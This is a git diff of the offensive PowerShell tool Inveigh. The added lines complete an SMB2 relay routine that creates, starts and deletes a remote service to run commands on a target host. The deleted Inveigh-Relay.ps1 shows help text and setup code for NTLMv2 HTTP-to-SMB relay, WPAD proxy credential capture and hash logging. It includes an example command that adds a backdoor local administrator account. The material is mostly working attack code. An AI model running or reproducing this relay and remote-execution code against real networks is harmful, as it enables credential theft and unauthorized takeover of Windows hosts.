+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $SCM_data_last = $SCM_data[$SMB_split_index_tracker..$SCM_data.Length]
+ $packet_RPC_data = New-PacketRPCRequest 0x02 0 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0c,0x00 $SCM_data_last
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID $RPC_data.Length
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+
+ 'StartServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '00-00-00-00')
+ {
+ Write-Verbose "Service $SMB_service created on $Target"
+ $SMB_service_context_handle = $SMB_client_receive[112..131]
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SCM_data = New-PacketSCMStartServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x13,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ Write-Verbose "Trying to execute command on $Target"
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'DeleteServiceW'
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[132..135]) -eq '31-04-00-00')
+ {
+ Write-Output "Service $SMB_service creation failed on $Target"
+ $SMBExec_failed = $true
+ }
+ else
+ {
+ Write-Output "Service creation fault context mismatch"
+ $SMBExec_failed = $true
+ }
+
+ }
+
+ 'DeleteServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '1d-04-00-00')
+ {
+ Write-Output "Command executed with service $SMB_service on $Target"
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '02-00-00-00')
+ {
+ Write-Output "Service $SMB_service failed to start on $Target"
+ }
+
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SCM_data = New-PacketSCMDeleteServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x02,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadRequest'
+ $SMB_client_stage_next = 'CloseServiceHandle'
+ $SMB_close_service_handle_stage = 1
+ }
+
+ 'CloseServiceHandle'
+ {
+
+ if($SMB_close_service_handle_stage -eq 1)
+ {
+ Write-Verbose "Service $SMB_service deleted on $Target"
+ $SMB2_message_ID += 20
+ $SMB_close_service_handle_stage++
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_context_handle
+ }
+ else
+ {
+ $SMB2_message_ID++
+ $SMB_client_stage = 'CloseRequest'
+ $packet_SCM_data = New-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
+ }
+
+ $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SCM_data.Length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x00,0x00
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB2_data = New-PacketSMB2WriteRequest $SMB_file_ID ($RPC_data.Length + $SCM_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $RPC_data_length = $SMB2_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+
+ 'CloseRequest'
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2CloseRequest $SMB_file_ID
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'TreeDisconnect'
+ }
+
+ 'TreeDisconnect'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2TreeDisconnectRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($session_string -and !$Logoff)
+ {
+ $SMB_client_stage = 'Exit'
+ }
+ else
+ {
+ $SMB_client_stage = 'Logoff'
+ }
+
+ }
+
+ 'Logoff'
+ {
+ $SMB2_message_ID += 20
+ $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["CreditRequest"] = 0x7f,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2SessionLogoffRequest
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ }
+
+ }
+
+ if($SMBExec_failed)
+ {
+ BREAK SMB_execute_loop
+ }
+
+ }
+
+ }
+
+ }
+
+ if($session_string -and $Inveigh)
+ {
+ $inveigh.session_lock_table[$session] = 'open'
+ $inveigh.session_message_ID_table[$session] = $SMB2_message_ID
+ $inveigh.session_list[$session] | Where-Object {$_."Last Activity" = Get-Date -format s}
+ }
+
+ if(!$session_string -or $Logoff)
+ {
+ $SMB_client.Close()
+ $SMB_client_stream.Close()
+ }
+
+}
+
+} \ No newline at end of file
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
deleted file mode 100644
index b7bd457..0000000
--- a/Scripts/Inveigh-Relay.ps1
+++ /dev/null
@@ -1,4516 +0,0 @@
-function Invoke-InveighRelay
-{
-<#
-.SYNOPSIS
-Invoke-InveighRelay performs NTLMv2 HTTP to SMB relay with psexec style command execution.
-
-.DESCRIPTION
-Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB1/SMB2 relay with psexec style command execution.
-
- HTTP/HTTPS to SMB NTLMv2 relay with granular control
- Supports SMB1 and SMB2 targets
- Does not require priveleged access on the Invoke-InveighRelay host
- The Invoke-InveighRelay host can be targeted for privilege escalation
- NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS
- Granular control of console and file output
-
-.PARAMETER Challenge
-Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
-challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be
-pulled from the SMB relay target.
-
-.PARAMETER Command
-Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
-
-.PARAMETER ConsoleOutput
-Default = Disabled: (Low/Medium/Y/N) Enable/Disable real time console output. If using this option through a
-shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
-
-.PARAMETER ConsoleQueueLimit
-Default = Unlimited: Maximum number of queued up console log entries when not using the real time console.
-
-.PARAMETER ConsoleStatus
-(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
-displaying full capture lists when running through a shell that does not have access to the support functions.
-
-.PARAMETER ConsoleUnique
-Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
-and username combinations when real time console output is enabled.
-
-.PARAMETER FileOutput
-Default = Disabled: (Y/N) Enable/Disable real time file output.
-
-.PARAMETER FileOutputDirectory
-Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be
-enabled.
-
-.PARAMETER HTTP
-Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
-
-.PARAMETER HTTPIP
-Default = Any: IP address for the HTTP/HTTPS listener.
-
-.PARAMETER HTTPPort
-Default = 80: TCP port for the HTTP listener.
-
-.PARAMETER HTTPS
-Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in
-the local store. If the script does not exit gracefully, manually remove the certificate. This feature requires
-local administrator access.
-
-.PARAMETER HTTPSPort
-Default = 443: TCP port for the HTTPS listener.
-
-.PARAMETER HTTPSCertIssuer
-Default = Inveigh: The issuer field for the cert that will be installed for HTTPS.
-
-.PARAMETER HTTPSCertSubject
-Default = localhost: The subject field for the cert that will be installed for HTTPS.
-
-.PARAMETER HTTPSForceCertDelete
-Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and
-HTTPSCertSubject.
-
-.PARAMETER HTTPResetDelay
-Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
-will have a delay before their connections are reset when Inveigh doesn't receive data. This can increase the
-chance of capturing/relaying authentication through a popup box with some browsers (Firefox).
-
-.PARAMETER HTTPResetDelayTimeout
-Default = 30 Seconds: HTTPResetDelay timeout in seconds.
-
-.PARAMETER LogOutput
-Default = Enabled: (Y/N) Enable/Disable storing log messages in memory.
-
-.PARAMETER MachineAccounts
-Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
-
-.PARAMETER OutputStreamOnly
-Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if
-running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the
-various yellow warning messages if enabled.
-
-.PARAMETER ProxyRelay
-Default = Disabled: (Y/N): Enable/Disable relaying proxy authentication.
-
-.PARAMETER ProxyIP
-Default = Any: IP address for the proxy listener.
-
-.PARAMETER ProxyPort
-Default = 8182: TCP port for the proxy listener.
-
-.PARAMETER ProxyIgnore
-Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
-will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly
-with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is
-cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting
--SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by
-closing and reopening.
-
-.PARAMETER RelayAutoDisable
-Default = Enable: (Y/N) Enable/Disable automaticaly disabling SMB relay after a successful command execution on
-target.
-
-.PARAMETER RelayAutoExit
-Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error.
-
-.PARAMETER RunTime
-(Integer) Run time duration in minutes.
-
-.PARAMETER Service
-Default = 20 Character Random: Name of the service to create and delete on the target.
-
-.PARAMETER ShowHelp
-Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
-
-.PARAMETER SMB1
-(Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the
-target.
-
-.PARAMETER StartupChecks
-Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
-
-.PARAMETER StatusOutput
-Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
-
-.PARAMETER Target
-IP address of system to target for SMB relay.
-
-.PARAMETER Tool
-Default = 0: (0/1/2) Enable/Disable features for better operation through external tools such as Meterpreter's
-PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire.
-0 = None, 1 = Metasploit/Meterpreter, 2 = Empire
-
-.PARAMETER Usernames
-Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and
-domain\username format.
-
-.PARAMETER WPADAuth
-Default = NTLM: (Anonymous/NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
-Anonymous can prevent browser login prompts.
-
-.PARAMETER WPADAuthIgnore
-Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
-will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login
-popups for authenticated wpad.dat requests such as Firefox.
-
-.EXAMPLE
-Invoke-Inveigh -HTTP N
-Invoke-InveighRelay -Target 192.168.2.55 -Command "net user Inveigh Spring2017 /add && net localgroup administrators Inveigh /add"
-
-.LINK
-https://github.com/Kevin-Robertson/Inveigh
-#>
-
-# Parameter default values can be modified in this section:
-[CmdletBinding()]
-param
-(
- [parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox",
- [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
- [parameter(Mandatory=$false)][Array]$Usernames = "",
- [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "",
- [parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
- [parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
- [parameter(Mandatory=$false)][Int]$HTTPPort = "80",
- [parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
- [parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30",
- [parameter(Mandatory=$false)][Int]$ProxyPort = "8492",
- [parameter(Mandatory=$false)][Int]$RunTime = "",
- [parameter(Mandatory=$true)][String]$Command = "",
- [parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh",
- [parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost",
- [parameter(Mandatory=$false)][String]$Service,
- [parameter(Mandatory=$true)][String]$Target = "",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LogOutput = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoDisable = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoExit = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N",
- [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
- [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM",
- [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$FileOutputDirectory = "",
- [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
- [parameter(Mandatory=$false)][Switch]$SMB1,
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
- [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0",
- [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if ($invalid_parameter)
-{
- Write-Output "Error:$($invalid_parameter) is not a valid parameter."
- throw
-}
-
-$inveigh_version = "1.3"
-
-if($ProxyIP -eq '0.0.0.0')
-{
- $proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
-}
-
-if(!$FileOutputDirectory)
-{
- $output_directory = $PWD.Path
-}
-else
-{
- $output_directory = $FileOutputDirectory
-}
-
-if(!$inveigh)
-{
- $global:inveigh = [HashTable]::Synchronized(@{})
- $inveigh.cleartext_list = New-Object System.Collections.ArrayList
- $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
- $inveigh.log = New-Object System.Collections.ArrayList
- $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
- $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
- $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
- $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
- $inveigh.POST_request_list = New-Object System.Collections.ArrayList
- $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
- $inveigh.valid_host_list = New-Object System.Collections.ArrayList
-}
-
-if($inveigh.relay_running)
-{
- Write-Output "Error:Invoke-InveighRelay is already running, use Stop-Inveigh"
- throw
-}
-
-if(!$inveigh.running)
-{
- $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
- $inveigh.console_queue = New-Object System.Collections.ArrayList
- $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
- $inveigh.log_file_queue = New-Object System.Collections.ArrayList
- $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
- $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
- $inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList
- $inveigh.status_queue = New-Object System.Collections.ArrayList
- $inveigh.console_input = $true
- $inveigh.console_output = $false
- $inveigh.file_output = $false
- $inveigh.HTTPS_existing_certificate = $false
- $inveigh.HTTPS_force_certificate_delete = $false
- $inveigh.log_output = $true
- $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
- $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
- $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
- $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
- $inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt"
-}
-
-if($StartupChecks -eq 'Y')
-{
-
- $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
-
- if($HTTP -eq 'Y')
- {
- $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPPort "
- }
-
- if($HTTPS -eq 'Y')
- {
- $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPSPort "
- }
-
- if($Proxy -eq 'Y')
- {
- $proxy_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort "
- }
-
-}
-
-$inveigh.relay_running = $true
-$inveigh.SMB_relay = $true
-
-if($StatusOutput -eq 'Y')
-{
- $inveigh.status_output = $true
-}
-else
-{
- $inveigh.status_output = $false
-}
-
-if($OutputStreamOnly -eq 'Y')
-{
- $inveigh.output_stream_only = $true
-}
-else
-{
- $inveigh.output_stream_only = $false
-}
-
-if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension
-{
- $inveigh.tool = 1
- $inveigh.output_stream_only = $true
- $inveigh.newline = ""
- $ConsoleOutput = "N"
-}
-elseif($Tool -eq 2) # PowerShell Empire
-{
- $inveigh.tool = 2
- $inveigh.output_stream_only = $true
- $inveigh.console_input = $false
- $inveigh.newline = "`n"
- $LogOutput = "N"
- $ShowHelp = "N"
-
- switch ($ConsoleOutput)
- {
-
- 'Low'
- {
- $ConsoleOutput = "Low"
- }
-
- 'Medium'
- {
- $ConsoleOutput = "Medium"
- }
-
- default
- {
- $ConsoleOutput = "Y"
- }
-
- }
-
-}
-else
-{
- $inveigh.tool = 0
- $inveigh.newline = ""
-}
-
-# Write startup messages
-$inveigh.status_queue.Add("Inveigh Relay $inveigh_version started at $(Get-Date -format 's')") > $null
-
-if($FileOutput -eq 'Y')
-{
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay $inveigh_version started") > $null
-}
-
-if($LogOutput -eq 'Y')
-{
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay started") > $null
- $inveigh.log_output = $true
-}
-else
-{
- $inveigh.log_output = $false
-}
-
-if($firewall_status)
-{
- $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null
-
- $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2
- $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}"
-
- if($firewall_powershell)
- {
- $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed") > $null
- }
-
-}
-
-if($HTTP -eq 'Y')
-{
-
- if($HTTP_port_check)
- {
- $HTTP = "N"
- $inveigh.status_queue.Add("HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null
- }
- else
- {
- $inveigh.status_queue.Add("HTTP Capture/Relay = Enabled") > $null
-
- if($HTTPIP)
- {
- $inveigh.status_queue.Add("HTTP IP Address = $HTTPIP") > $null
- }
-
- if($HTTPPort -ne 80)
- {
- $inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null
- }
- }
-
-}
-else
-{
- $inveigh.status_queue.Add("HTTP Capture/Relay = Disabled") > $null
-}
-
-if($HTTPS -eq 'Y')
-{
-
- if($HTTPS_port_check)
- {
- $HTTPS = "N"
- $inveigh.HTTPS = $false
- $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To In Use Port $HTTPSPort") > $null
- }
- else
- {
-
- try
- {
- $inveigh.certificate_issuer = $HTTPSCertIssuer
- $inveigh.certificate_CN = $HTTPSCertSubject
- $inveigh.status_queue.Add("HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null
